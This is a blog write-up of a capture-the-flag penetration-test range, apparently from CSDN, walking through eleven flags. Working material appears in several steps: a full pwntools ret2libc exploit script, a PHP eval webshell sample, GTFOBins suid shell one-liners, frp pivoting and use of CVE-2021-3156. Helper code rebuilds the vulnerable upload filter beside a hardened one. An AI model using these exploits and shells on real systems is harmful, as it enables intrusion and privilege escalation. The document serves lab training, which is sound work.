A record of a bumpy range run

Foreword

Bugku's PAR mode range "Penetration Test 1" has 11 flags in total. I played it several times over four days and in the end only got 10 flags myself (the last one was done by following the official writeup). The whole run was quite bumpy. Here I share my process and my own thinking, and hope to get advice from the experts.

Process

First attempt

0x01 flag1(F12)

When the range starts it hands you an IP; first run nmap to scan for services.


Four ports are open. Start with port 80 and open the page.

Run Yujian (御剑, a directory scanner) against it first. With this kind of site, get familiar with its functions first: click around and read the page source. Sure enough, the flag is at the bottom of the page source.

0x02 flag2 (weak password)

Following the hint in the previous flag, look at the Yujian scan results.


It looks like we need to log in as the administrator. Append admin to the URL to reach the back end; it prompts for login first and then

redirects to the admin login page.
Faced with an admin login page, the usual ideas are: try weak passwords, read the page source, look for unauthenticated JS API endpoints, click "forgot password", and so on. Try the weak password first: admin/admin, and it goes straight in.

flag2 is in Basic Settings.

0x03 flag3 (double write bypass getshell)

Our favourite way to get a shell is file upload. Looking through the admin functions, the logo can be uploaded in Basic Settings.


Although there is a whitelist, it can be edited by the administrator.

After adding php to the allowed suffixes and submitting, capture the upload in Burp Suite and send it. The response says "The suffix of the uploaded file cannot be empty", which means the server strips the php suffix.

Double-write the suffix (pphphp) to bypass the filter, and it succeeds.
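How a single-pass "php" filter is beaten by double-writing, as an added example: this is a reconstruction of the behaviour observed above (an admin-editable allowlist that already contains "php", and a server that strips the literal "php" from the suffix before checking it), not the range's actual upload code. A hardened check is shown next to it; the function and constant names are my own.

```python
import secrets

# Reconstruction (assumed, not the range's code) of the upload check whose behaviour the
# writeup shows: the allowlist is editable by the admin and already has "php" added.
ADMIN_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "php"}


def split_ext(filename):
    """('shell', 'php') for 'shell.php'; ('noext', '') when there is no dot."""
    name, dot, ext = filename.rpartition(".")
    return (name, ext) if dot else (filename, "")


def vulnerable_upload_name(filename):
    """One left-to-right pass removes every 'php': 'php' -> '' but 'pphphp' -> 'php'."""
    name, ext = split_ext(filename)
    ext = ext.replace("php", "")
    if not ext:
        raise ValueError("The suffix of the uploaded file cannot be empty")
    if ext not in ADMIN_ALLOWLIST:
        raise ValueError("suffix not allowed")
    return f"{name}.{ext}"


# Hardened version: a fixed image-only allowlist that the admin UI cannot extend, the
# extension is compared case-insensitively, the content must start with a matching magic
# number, and the stored name is generated server-side so the client never controls it.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def hardened_upload_name(filename, content):
    _, ext = split_ext(filename)
    ext = ext.lower()
    if ext not in IMAGE_MAGIC:
        raise ValueError("only jpg/jpeg/png/gif are accepted")
    if not content.startswith(IMAGE_MAGIC[ext]):
        raise ValueError("file content does not match its extension")
    return f"{secrets.token_hex(16)}.{ext}"


def outcome(check, *args):
    """Return the stored name, or the rejection message, so both paths can be compared."""
    try:
        return check(*args)
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    webshell = b"<?php @eval($_POST['x']); ?>"          # constructed sample upload
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16            # constructed PNG header
    for label, fn, args in [
        ("vulnerable shell.php", vulnerable_upload_name, ("shell.php",)),
        ("vulnerable shell.pphphp", vulnerable_upload_name, ("shell.pphphp",)),
        ("hardened shell.pphphp", hardened_upload_name, ("shell.pphphp", webshell)),
        ("hardened logo.png with php body", hardened_upload_name, ("logo.png", webshell)),
        ("hardened logo.PNG", hardened_upload_name, ("logo.PNG", png)),
    ]:
        print(f"{label}: {outcome(fn, *args)}")
```

The strip happens in a single pass, so "pphphp" loses its middle "php" and collapses to exactly the suffix the filter was meant to remove; looping the replacement until nothing changes would close that specific hole, but the allowlist that the admin can edit is the real defect, which is why the hardened variant hard-codes it and checks content as well as name.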

Open it in the browser, connect with Behinder (Ice Scorpion), and following the hint "/home" after flag2, go to the home directory to get the flag.

0x04 flag4 (weak database password)

Following the previous flag's hint, look at the database. Try the MySQL default credentials root/root and connect; the first thing in view is the flag table in the flag database. Read it directly and done.

0x05 flag5 (pwn buffer overflow)


Following the challenge's hint and the previous flag's hint, go to /home/ctf and find the main file.

Pull it out and look at it: a 32-bit executable.

Drag it into IDA (32-bit) and press F5 to view the pseudocode.


The initial judgement is that this is a pwn challenge of the buffer overflow type, but as a novice web player I knew nothing about pwn, so I definitely couldn't do it. That ended the first attempt.

Second attempt

0x05 flag5 (pwn buffer overflow)

After three days of suffering through pwn tutorials, I trembled my way into the second attempt.
This time, looking at the pseudocode of main, I could see at a glance that the vul function must have an overflow (obvious, haha). But there are many kinds of buffer overflow exploitation: ret2text, ret2shellcode, ret2syscall, ret2libc. How do we decide which one this challenge needs?

The general approach to a pwn challenge:
1. No NX, and the program itself contains a function that runs a system command: find that function's address and overwrite the return address with it: ret2text.
2. No NX, but no system function available: use the input function to write shellcode into the process and overwrite the return address with the shellcode's address: ret2shellcode.
3. NX enabled: use ROPgadget to build a chain that invokes execve through int 0x80: ret2syscall.
4. NX enabled: use libc to obtain the relative position of system: ret2libc.

Laid out this way it is quite clear. Run checksec.


The main binary has NX enabled. What is NX?

NX means No-eXecute: memory pages that hold data are marked non-executable, so data cannot run as code. This stops an attacker's shellcode, placed in a data area through an overflow, from being executed.

From the information above we know this is a ret2libc challenge. How is that done?

1. Leak the runtime address of a libc function.
2. Identify the libc version (only a function that has already been called has its real address resolved in the GOT):
LibcSearcher: https://github.com/lieanu/LibcSearcher
https://libc.blukat.me
3. Compute the addresses of system and "/bin/sh" from the offsets:
libc base = runtime address of the leaked function - that function's offset in libc
address of any other symbol = libc base + that symbol's offset
4. Run the exploit and get a shell.

Purpose and approach clear, I pulled a pwndocker image, started gdb debugging, generated a long cyclic pattern, fed it as input, and the program crashed.



cyclic then gives the distance from the buffer to the return address: 40. Now the gadget:

because write is called with three arguments pushed on the stack, they must be popped afterwards, so we need a pop; pop; pop; ret gadget that discards the three write arguments and then returns to the program's start so it runs again. Use the third from the last one in the ROPgadget output.
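The offset search and the two-stage ret2libc layout, written out as an added example in plain Python (no pwntools, no target needed). This is not the author's exploit script: only the gadget address 0x08048559 and the offset 40 come from the writeup, and the PLT, GOT and libc addresses in the usage lines are made-up values for illustration. The pattern generator uses the same de Bruijn construction as pwntools' cyclic, so the offsets agree with the tool.

```python
import string
import struct

ALPHABET = string.ascii_lowercase
WINDOW = 4   # EIP is 32 bits: a unique 4-byte window pins down the position


def de_bruijn(alphabet=ALPHABET, n=WINDOW):
    """Lexicographically least de Bruijn sequence B(k, n): every n-char window occurs once.
    Same construction as pwntools' cyclic(), so cyclic_find agrees with the tool."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
            return
        a[t] = a[t - p]
        db(t + 1, p)
        for j in range(a[t - p] + 1, k):
            a[t] = j
            db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


_PATTERN = de_bruijn().encode()   # 26**4 bytes, generated once


def cyclic(length):
    """Pattern to feed the program; afterwards EIP holds the bytes at the overflow offset."""
    return _PATTERN[:length]


def cyclic_find(value):
    """Offset of the bytes that ended up in EIP; takes raw bytes or the int gdb shows."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return _PATTERN.find(value[:WINDOW])


def p32(v):
    return struct.pack("<I", v)


def u32(b):
    return struct.unpack("<I", b[:4])[0]


def leak_chain(offset, write_plt, ppp_ret, write_got, ret_to):
    """Stage 1 frame: call write(1, write@got, 4); the pop;pop;pop;ret gadget then
    discards the three arguments and returns to ret_to so the program runs again."""
    return (b"A" * offset
            + p32(write_plt)       # overwrites the saved EIP: "call" write@plt
            + p32(ppp_ret)         # write's return address: the gadget
            + p32(1)               # fd = stdout
            + p32(write_got)       # buf = GOT slot holding write's libc address
            + p32(4)               # count
            + p32(ret_to))         # the gadget's final ret lands here


def libc_base(leaked_addr, symbol_offset):
    """base = leaked address - symbol offset. A libc base is page aligned; anything
    else means the leak is wrong or the libc build chosen in LibcSearcher is wrong."""
    base = leaked_addr - symbol_offset
    if base & 0xfff:
        raise ValueError(f"{base:#x} is not page aligned: wrong libc or bad leak")
    return base


def shell_chain(offset, system_addr, binsh_addr):
    """Stage 2 frame: return into system("/bin/sh"); the 4 junk bytes are the return
    address system would use when it finishes."""
    return b"A" * offset + p32(system_addr) + b"JUNK" + p32(binsh_addr)


if __name__ == "__main__":
    # Pretend gdb showed this EIP after feeding cyclic(100) to the program.
    crash_eip = u32(cyclic(100)[40:44])
    off = cyclic_find(crash_eip)
    print(f"EIP={crash_eip:#x} -> offset {off}")
    # Made-up addresses standing in for what ELF() and LibcSearcher would give.
    stage1 = leak_chain(off, 0x08048390, 0x08048559, 0x0804a018, 0x080483f0)
    print("stage 1:", stage1[off:].hex())
    base = libc_base(0xf7e53ae0, 0xd5ae0)
    stage2 = shell_chain(off, base + 0x45830, base + 0x18e363)
    print("stage 2:", stage2[off:].hex())
```

The page-alignment check in libc_base is the cheap sanity test to run before sending stage 2: LibcSearcher may list several candidate builds, and a candidate whose write offset does not give a 0x1000-aligned base can be discarded without a network round trip.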

Then write the exploit:

from pwn import *
from LibcSearcher import *

p = remote('xx.xx.xx.xx', 9999)   # remote target
#p = process('./main')           # local debugging
elf = ELF('./main')              # load the binary to read its PLT/GOT/symbols

start_addr = elf.symbols['_start']   # re-enter the program after the leak
write_plt = elf.plt['write']
write_got = elf.got['write']         # GOT slot holding write's real libc address (to be leaked)

ppp_ret = 0x08048559   # pop; pop; pop; ret gadget, clears write's three arguments

offset = 40            # distance from the buffer to the saved return address

# stage 1: write(1, write_got, 8) leaks write's libc address, then return to _start
payload = b'A' * offset + p32(write_plt) + p32(ppp_ret) + p32(1) \
    + p32(write_got) + p32(8) + p32(start_addr)

p.sendlineafter(b'plz input your name:\n', payload)

write_addr = u32(p.recv(4))   # real address of write in the remote libc
log.info(f'write@libc = {write_addr:#x}')

libc = LibcSearcher('write', write_addr)   # identify which libc build the target uses

libc_base = write_addr - libc.dump('write')   # libc base; other symbols are base + offset
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

# stage 2: padding + system address + fake return address for system + address of "/bin/sh"
payload = b'A' * offset + p32(system_addr) + b'a' * 4 + p32(binsh_addr)

p.sendlineafter(b'plz input your name:\n', payload)
p.interactive()

Run the script; when LibcSearcher lists candidate libcs, pick the third one. We get a shell and the flag.
 

0x06 flag6 (directory scan)

Following the previous flag's hint, access port 8080.


A login page. As usual, scan directories first. I read the page source and tried weak passwords without success, and finally looked at the Yujian scan results,

opened robots.txt, and out came the flag.

0x07 flag7 (shiro deserialization)

The previous flag hints at Shiro. Capture the request in Burp Suite and the fingerprint is obvious.


Run the Shiro exploitation tool straight at it,

and the flag is ours.

0x08 flag8 (suid privilege escalation)

This flag gives no hint, and the normal flow would require privilege escalation. Although the shell from the pwn challenge was root, it does not seem to be the same machine; presumably the ports are services on intranet hosts mapped out through this public-facing server.
It would have been more convenient to pop a reverse shell back to myself, but it never connected back, maybe because the box cannot reach the internet. So,
escalating honestly: I only know three tricks, suid binaries, sudo -l to check sudoers, and kernel exploits. First, look at suid.


Then check GTFOBins for the corresponding commands; only find qualified,

so I used find to escalate, ran the command, and got the flag.
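An added example, not from the writeup, that automates the suid hunt: a Python equivalent of `find / -perm -4000 -type f` plus a lookup of a few GTFOBins suid entries (commands quoted as gtfobins.github.io lists them). The function names are mine, and the demo tree built by make_demo_tree() is constructed so the block runs offline; on a real box call triage('/').

```python
import os
import stat
import tempfile

# GTFOBins "SUID" one-liners for a few common binaries. GTFOBins writes them as ./name;
# suggest() substitutes the real path of the binary that was found.
GTFOBINS_SUID = {
    "find": "./find . -exec /bin/sh -p \\; -quit",
    "bash": "./bash -p",
    "env": "./env /bin/sh -p",
    "python": "./python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
    "python3": "./python3 -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
}
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")   # not worth walking


def find_suid(root="/"):
    """Regular files under root with the setuid bit: (path, owner uid) pairs, sorted."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: a symlink's mode bits are not its target's
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return sorted(hits)


def suggest(path):
    """GTFOBins one-liner for this binary with its real path filled in, or None."""
    base = os.path.basename(path)
    cmd = GTFOBINS_SUID.get(base)
    return cmd.replace("./" + base, path, 1) if cmd else None


def triage(root="/"):
    """(path, owner uid, suggested command or None) for every setuid file found.
    Only root-owned binaries (uid 0) matter for escalation to root."""
    return [(path, uid, suggest(path)) for path, uid in find_suid(root)]


def make_demo_tree():
    """Constructed sample tree: a fake setuid 'find' next to a plain file."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    fake_find = os.path.join(root, "bin", "find")
    plain = os.path.join(root, "bin", "plain")
    os.makedirs(os.path.dirname(fake_find))
    for p in (fake_find, plain):
        with open(p, "wb") as fh:
            fh.write(b"#!/bin/sh\n")
    os.chmod(fake_find, 0o4755)   # setuid bit on (chmod on one's own file needs no root)
    os.chmod(plain, 0o755)
    return root, fake_find, plain


if __name__ == "__main__":
    root, _, _ = make_demo_tree()
    for path, uid, cmd in triage(root):
        print(f"{path} (owner uid {uid}) -> {cmd or 'check GTFOBins by hand'}")
```

The lookup only covers binaries whose GTFOBins entry I am sure of; anything else that turns up setuid still needs a manual check, which is why triage() keeps the path and owner for every hit rather than only the matches.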

0x09 flag9 (intranet)

Following the hint, look at the intranet.


Ran ifconfig through the Shiro tool's command execution to see the network segment, but there was never any output,

and then time was almost up, so the second attempt ended.

Third attempt

0x09 flag9 (intranet)

A brief recap first. So far we have three shells: one from the uploaded webshell, one from pwn, and one from Shiro deserialization. Try each.


This time look directly at which commands are available. Nicely, the box has nmap, and wget.


Scan with nmap directly (best to save the scan results to a file and read them from there); there are four machines.

Use wget to download the full frp package from my public VPS, start a SOCKS5 proxy, then visit each IP and port. Only 192.168.0.4 has a web site not seen before. In its upper-left corner

is a familiar little icon: the ThinkPHP framework. Enter a random URL and the site errors out, revealing ThinkPHP version 5.0.20.

This version has a code execution vulnerability, so write a one-line webshell directly.


Connect with AntSword (with the proxy configured) and get the flag in the website root.

0x10 flag10 (database)

The last flag hinted at the database, so first look at the site's configuration file.


(It suddenly occurred to me that for flag4 I should also have taken the database credentials from the site's configuration file; I just got lucky trying the default password directly. Adding a flag4 screenshot here.) Tried to connect to MySQL, but it did not

work.

I wanted to see whether this machine can reach the internet, but ping got no reply, so

I assumed it cannot and that I needed a second-level proxy. This machine also has wget; forward port 3306 of 192.168.0.2 through this machine. But the second-level proxy kept running into port problems,

which ate a lot of time; in the end frp never connected, time ran out, and the third attempt ended there.

Fourth attempt

0x10 flag10 (database)

After restarting the range this time, since the second-level proxy really could not be set up, I assumed with a bit of luck that the box might reach the internet after all, and on trying, it really could! I exposed port 3306 to my public VPS, connected straight away with Navicat, and there was the familiar flag.
 

0x11 flag11 (privilege escalation)

The previous flag's hint makes it obvious: escalate privileges. Look for suid binaries: none; check sudo -l; then scheduled tasks, and the OS and kernel version.


Ubuntu, 64-bit, Linux 3.0.10. Charging in like a tiger, I tried several kernel exploit scripts, none of which worked.
The hint is the sudo version: 1.8.31 has the privilege escalation vulnerability CVE-2021-3156. I


tried the exploit script for this CVE many times, but escalation still failed from both AntSword and Behinder. I don't know the exact reason; supposedly it is an output (echo) problem.

In the end I uploaded a Behinder webshell, bounced the shell from Behinder into a Meterpreter session on the VPS (the GUI one is more comfortable to use than the command line), and ran the exploit from that shell, which finally succeeded.
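Deciding whether a sudo build falls in the CVE-2021-3156 (Baron Samedit) range, as an added example that is not part of the writeup. It parses `sudo --version` output against the affected ranges from the advisory (legacy 1.8.2 to 1.8.31p2, stable 1.9.0 to 1.9.5p1) and classifies the output of the advisory's `sudoedit -s /` probe. The caveat a practitioner wants: distributions backport fixes without changing the upstream version string (Ubuntu's fixed package still reports 1.8.31), so the version check only flags a candidate and the probe gives the answer. Function names are mine.

```python
import re

# Affected ranges from the CVE-2021-3156 advisory; 1.8.32 and 1.9.5p2 are the upstream fixes.
AFFECTED = {
    "legacy": ((1, 8, 2, 0), (1, 8, 32, 0)),
    "stable": ((1, 9, 0, 0), (1, 9, 5, 2)),
}
_VER_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(?:p(\d+))?\b")


def parse_sudo_version(text):
    """'Sudo version 1.8.31' -> (1, 8, 31, 0); '1.9.5p2' -> (1, 9, 5, 2).
    The 'p' suffix is a patch level and must sort after the plain release."""
    m = _VER_RE.search(text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def version_in_affected_range(text):
    """True when the upstream version string is inside an affected range.
    Only a candidate: a distro may have backported the fix under the same number."""
    v = parse_sudo_version(text)
    return any(lo <= v < hi for lo, hi in AFFECTED.values())


def classify_sudoedit_probe(output):
    """Output of `sudoedit -s /` run as an unprivileged user. Per the advisory, an error
    starting with 'sudoedit:' means vulnerable and one starting with 'usage:' means patched."""
    lines = output.strip().splitlines()
    first = lines[0] if lines else ""
    if first.startswith("sudoedit:"):
        return "vulnerable"
    if first.startswith("usage:"):
        return "patched"
    return "unknown"


def assess(version_output, probe_output):
    """Combine both signals; the probe wins because it tests the actual binary."""
    candidate = version_in_affected_range(version_output)
    probe = classify_sudoedit_probe(probe_output)
    if probe != "unknown":
        return probe
    return "candidate (version in range, confirm with probe)" if candidate else "not affected"


if __name__ == "__main__":
    # Constructed sample outputs, shaped like the real commands' output.
    ver = "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n"
    vuln_probe = "sudoedit: /: not a regular file\n"
    patched_probe = "usage: sudoedit [-AknS] [-r role] [-t type] [-C num] file ...\n"
    print(parse_sudo_version(ver), version_in_affected_range(ver))
    print(assess(ver, vuln_probe), "/", assess(ver, patched_probe))
```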

Summary

That is the end. Looking back over the whole process, there were many places where the work could have been simplified and a lot of wasted effort avoided. Although the process was painful, I learned a lot from it and have a lot of feelings (it's my own fault for being a noob, haha; this mode is a lot of fun and I will keep playing next time). Masters, please go easy on me, thank you.


Source: blog.csdn.net/Python_0011/article/details/129788206